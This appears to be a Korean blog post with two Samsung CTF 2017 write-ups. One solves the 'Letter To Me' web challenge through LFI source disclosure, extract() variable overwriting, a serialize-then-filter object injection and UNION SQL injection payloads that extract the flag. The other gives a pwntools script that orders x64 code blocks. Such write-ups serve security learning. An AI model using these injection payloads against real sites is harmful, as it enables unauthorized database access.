Attack - Letter To Me(300 pts)




문제를 살펴보면 플래그는 DB 안에 있다는 힌트가 있으며, sql 파일과 서버 주소를 던져줬다.


sql 파일을 살펴보면 아래와 같다.





메인 페이지는 위와 같다. login페이지와 register 페이지가 있는 것을 확인 할 수 있다.




register 페이지의 경우 관리자에게 문의하여 로그인하라는 메시지가 나온다.




관리자에게 연락 할 수는 없기 때문에 page 파라미터에서 발생하는 LFI 취약점을 이용하여 PHP Wrapper로 페이지 소스를 긁어온다.




index.php를 살펴보면 conn.php를 include 한 이후 extract로 GET과 POST 파라미터를 변수화 시켜준다. 이 때 conn.php 안에 있는 db 정보를 변경할 수 있기 때문에 문제 페이지에서 받았던 SQL 테이블 데이터를 외부 서버에 생성 후 연결하여 admin으로 로그인 할 수 있다.




이 때 로그인 이후에는 위와 같이(login.php) 문제 서버의 세션으로 로그인이 유지되기 때문에 로그인 상태를 유지 할 수 있다.




위는 admin으로 로그인 한 후의 상태이다. 사용자를 초대 할 수 있으며, 해당 계정으로 접속 시 메시지를 자신에게 보내고 받을 수 있는 send.php와 show.php에 접근 할 수 있다.



<?php
   function generateRS($length = 64) {
      $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
      $charactersLength = strlen($characters);
      $randomString = '';

      $urandom = fopen("/dev/urandom", "rb");
      for ($i = 0; $i < $length; $i++) {
         $randomString .= $characters[ord(fread($urandom, 1)) % ($charactersLength - 1)];
      }
      return $randomString;
   }


   if(!ISSET($_SESSION['user']) || $_SESSION['user'] === "admin" || $_SESSION['user'] === "")
   {
      die("Nope!");
   }

   require "models.php";
   if(isset($letter))
   {
      $note = new note();
      $note->user = $_SESSION['user'];
      $note->letter = $letter;

      if($_FILES['file']['size'] > 0)
      {
         if($_FILES['file']['size'] > 30)
         {
            echo "too big";
         }
         else if($_FILES['file']['error'] > 0 || !is_uploaded_file($_FILES['file']['tmp_name']))
         {
            echo "error1";
         }
         else
         {
            $uploadfile = "/var/www/html/uploads/".generateRS();
            if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
            {
               $fname = $_FILES['file']['name'];
               $note->addfile($fname, $uploadfile);
            }
            else
            {
               echo "error2";
            }
         }
      }
      $note->add();
   }
?>

send.php




<?php
   if(!ISSET($_SESSION['user']) || $_SESSION['user'] === "admin" || $_SESSION['user'] === "")
   {
      die("Nope!");
   }

  require "models.php";
  $user = $_SESSION['user'];
  $user = mysql_real_escape_string($user);
  $DB->execute("select data from notes where username=\"${user}\"");
  $notes = $DB->fetch_all();

  foreach($notes as $note)
  {
     $note = unserialize($note);

     echo "<br>";
     $letter = $note->letter;
     $info = $note->resolve_file();
     echo "<div class=\"container\">";
     echo "<blockquote>";
     echo "<p>${letter}</p>";
     if(isset($info))
     {
        $path = $info[1];
        $name = $info[0];
        echo "<footer>Attached file: <cite title=\"Source Title\"><a href=\"".$path."\" download=\"".$name."\">file</a></cite></footer>";
    }
     else
       echo "<footer>Attached file: None</footer>";
       echo "</blockquote>";
    echo "</div>";
   }
?>

show.php




<?php
  class db
  {
     public $conn, $res;
     function __construct()
     {
        global $servername, $username, $password, $db_name;
        $this->conn = mysql_connect($servername, $username, $password) or die("connect error");
        mysql_select_db($db_name);
     }

     function execute($query)
     {
        $this->res = mysql_query($query) or die("SQL ERROR");
     }

     function fetch_all()
     {
        $res = array();
        while($row = mysql_fetch_row($this->res))
        {
       echo $row[0];
           array_push($res, $row[0]);
        }
        return $res;
     }

     function fetch_arr()
     {
        return mysql_fetch_array($this->res);
     }

     function fetch_one()
     {
        $res = mysql_fetch_row($this->res);
        return count($res) > 0 ? $res[0] : NULL;
     }

     function get_auto_incre()
     {
        return mysql_insert_id();
     }

  };


  $DB = new db();


  class note
  {
     public $user, $letter, $attached_file;

     function addfile($realname, $filename)
     {
        global $DB;

        $realname = mysql_real_escape_string($realname);
        $filename = mysql_real_escape_string($filename);

        $DB->execute("insert into files values (NULL, \"${realname}\", \"${filename}\")");
        $this->attached_file = $DB->get_auto_incre();

     }

     function add()
     {
        global $DB;
        $str = serialize($this);
        $str = $this->filter($str);

        $user = mysql_real_escape_string($this->user);
        $str = mysql_real_escape_string($str);
        $DB->execute("insert into notes values (\"${user}\", \"${str}\")");
     }

     function filter($str)
     {
        global $profanity_word_replace;
        $filter_word = array("s**t", "f**k", "as*", "bi**h", "H**l");
        foreach($filter_word as $word)
        {
           $replace = str_repeat($profanity_word_replace, strlen($word));
           $word = preg_quote($word);
           $str = eregi_replace($word, $replace, $str);
        }
        return $str;
     }

     function resolve_file()
     {
        global $DB;
        $id = $this->attached_file;
        if($id)
        {
          $DB->execute("select realname, path from files where id=${id}");
          return $DB->fetch_arr();
       }
       return NULL;
     }
  };

?>

models.php


위 3개의 소스는 이 문제의 핵심인 send.php, show.php, models.php이다. models.php의 경우 index.php를 제외한 거의 대부분의 소스에서 include 하고 있는 소스이며, DB 관련 작업을 처리하는 함수의 정의가 담겨 있다.


send.php에서 파일을 업로드 할 경우 models.php에 정의되어있는 addfile 함수에서  DB에 파일 경로를 넣어준다. 또한 하나의 파일이 추가될때마다 자동으로 파일의 인덱스를 늘려주는 get_auto_incre 메소드를 사용하고 있다.

그리고 add 함수에서 사용자 이름과 해당하는 메시지를 저장하는데, 메시지를 저장할 때 serialize 함수를 이용하여 시리얼라이징 하며, filter 함수를 이용하여 유해 문자를 필터링 한다. 이 때, 시리얼라이징 이후 필터링을 거치기 때문에 s:4:”f**k”와 같이 시리얼라이징 되었을 경우 profanity_word_replace에 설정된 값만큼 4번 반복되어 값이 들어가진다. 현재 이 변수에 설정된 값은 conn.php에 ‘*’로 지정되어있으며, 이는 곧 f**k가 ****로 필터링 된다는 뜻이 된다. 하지만 extract 함수를 index.php에서 사용하고 있기 때문에 profanity_word_replace 변수의 값은 임의로 바꿀 수 있으며, 이를 이용하여 unserialize 함수를 사용하여 시리얼라이징을 해제, 객체화 할 때 취약점이 발생할 수 있다.




# table name

f**k";s:13:"attached_file";s:119:"1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0, 1) limit 1, 1";}


# column name

f**k";s:13:"attached_file";s:127:"1 union select 1,(select column_name from information_schema.columns where table_name=0x4c544f4d5f466c3367 limit 0,1) limit 1,1


# flag

f**k";s:13:"attached_file";s:68:"1 union select 1,(select flag from LTOM_Fl3g limit 0,1) limit 1,1


위와 같이 msg부분에 입력해주고, 전체 길이만큼 dummy byte로 채워지도록 profanity_word_replace를 재설정 한 후 요청하면 각각에 해당하는 결과를 얻을 수 있다


FLAG : SCTF{Enj0y_y0ur_0nly_life}

저작자표시 비영리 동일조건

'CTF > Samsung CTF 2017' 카테고리의 다른 글

[SCTF 2017] Coding - Buildingblocks(250 pts)  (0) 2017.07.24
[SCTF 2017] Reversing - Easyhaskell(200 pts)  (0) 2017.07.24
[SCTF 2017] Defense - Dfa(100 pts)  (0) 2017.07.24
[SCTF 2017] Attack - Readflag(100 pts)  (1) 2017.07.24

Coding - Buildingblocks(250 pts)




문제를 확인해보면 별다른 설명은 없고 nc 주소만 나와있다.



해당 서버에 접속을 해보면 10개의 스테이지로 나뉘어진 문제가 나타나며, 아래의 리스트는 base64로 인코딩 된 x64 코드 블록이며,  segmentation fault가 없도록 잘 조합하여 sha256으로 hash하여 보내라고 한다. 약 1분~2분정도의 timeout이 걸려있으며 이 시간 내에 코드 블록들을 조합하여 보내야한다.





#coding: utf-8
from pwn import *
import hashlib
import sys

def divide(t, idx, s, d, g):
    if t[idx] == '\xb8':
        a = 'mov eax,'
        b = '0x'+t[idx+1:idx+5][::-1].encode('hex')
        c = 5
        s = int(b,16)
    elif t[idx] == '\x2d':
        a = 'sub eax,'
        b = '0x'+t[idx+1:idx+5][::-1].encode('hex')
        c = 5
        s -= int(b,16)
    elif t[idx] == '\x05':
        a = 'add eax,'
        b = '0x'+t[idx+1:idx+5][::-1].encode('hex')
        c = 5
        s += int(b,16)
    elif t[idx] == '\x74':
        a = 'je 0xf\nmov eax, 0x0\nmov eax,'
        b = 'DWORD PTR [eax]'
        c = 10
    elif t[idx] == '\xf7':
        a = 'mul'
        b = 'edx'
        c = 2
        s *= d
    elif t[idx] == '\xba':
        a = 'mov edx,'
        b = '0x'+t[idx+1:idx+5][::-1].encode('hex')
        c = 5
        d = int(b,16)
    elif t[idx] == '\x3d':
        a = 'cmp eax,'
        b = '0x'+t[idx+1:idx+5][::-1].encode('hex')
        c = 5
        g = int(b,16)
    elif t[idx] == '\x48':
        a = 'mov rax, 0x3c\nmov rdi,'
        b = '0x0\nsyscall'
        c = 16
    s &= 0xffffffff
    return a, b, c, s, d, g

r = remote("buildingblocks.eatpwnnosleep.com", 46115)
for q in range(10):
    print r.recvuntil(")\n")
    data = r.recvuntil("]")
    data = eval(data)

    blocks = []

    res = ""
    for d in data:
        blocks.append(base64.b64decode(d).encode('hex'))

    #print blocks

    sum_list = []
    goal_list = []
    start = 0

    for b in blocks:
        block = b.decode('hex')
       idx = 0
        d = 0
        s = 0
        g = 0
        print "[*] {} block.".format(blocks.index(b))
        if block[0] == '\xb8':
            start = blocks.index(b)
        while idx < len(block):
            inst, value, i, s, d, g = divide(block, idx, s, d, g)
            idx += i
            print inst, value
        
        sum_list.append(s)  
        goal_list.append(g)
        print "[+] sum : {}\n".format(hex(s))

    print sum_list
    print goal_list
    print start

    cnt = 0
    now = start
    res = [start,]
    while cnt < len(blocks)-1:
        next = goal_list.index(sum_list[now])
        now = next
        cnt += 1
        res.append(now)

    key = ""
    for i in range(len(blocks)):
        key += blocks[res[i]].decode('hex')

    key = hashlib.sha256(key).hexdigest()
    r.sendline(key)

print r.recvuntil("}")

payload.py


위의 페이로드를 날려주면 아래와 같이 플래그를 얻어낼 수 있다.




FLAG : SCTF{45m_d1545m_f0r3v3r}

저작자표시 비영리 동일조건

'CTF > Samsung CTF 2017' 카테고리의 다른 글

[SCTF 2017] Attack - Letter to me(300 pts)  (0) 2017.07.24
[SCTF 2017] Reversing - Easyhaskell(200 pts)  (0) 2017.07.24
[SCTF 2017] Defense - Dfa(100 pts)  (0) 2017.07.24
[SCTF 2017] Attack - Readflag(100 pts)  (1) 2017.07.24

+ Recent posts

티스토리툴바